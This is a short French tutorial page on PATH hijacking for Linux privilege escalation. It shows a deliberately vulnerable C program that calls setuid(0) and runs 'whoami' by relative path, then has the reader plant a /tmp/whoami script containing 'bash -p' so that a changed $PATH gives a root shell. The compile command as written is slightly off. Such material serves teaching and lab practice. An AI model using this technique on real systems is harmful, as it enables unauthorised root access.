PATH Hijacking (test.c) - Linux Privilege Escalation

Créez un fichier dans le répertoire /tmp/test.c avec le contenu suivant :

#include <stdio.h>

int main(){
	setuid(0);
	printf("\n[+] Currently we are the next user: \n\n");
	system("/usr/bin/whoami");
	printf("\n[+] Currently we are the next user: \n\n");
	system("whoami");
	return 0;
}

Compilez le script avec gcc et créez le fichier test avec l'option -o en lui donnant des permissions Sudoers:

gcc test -o test

Si vous exécutez le script et filtrez par "whoami", vous remarquerez qu'il l'exécute d'abord avec le chemin absolu, puis de manière relative. Cela constitue une grave erreur si nous modifions le $PATH :

Modifiez le $PATH et la priorité est accordée au chemin /tmp :

Ensuite, créez dans le répertoire tmp le fichier suivant :

touch whoami
chmod +x whoami

Insérez le contenu suivant dans le fichier :

bash -p

Exécutez à nouveau le script test et grâce au $PATH, obtenez un accès à Bash en tant qu'utilisateur root :

Mis à jour il y a 1 an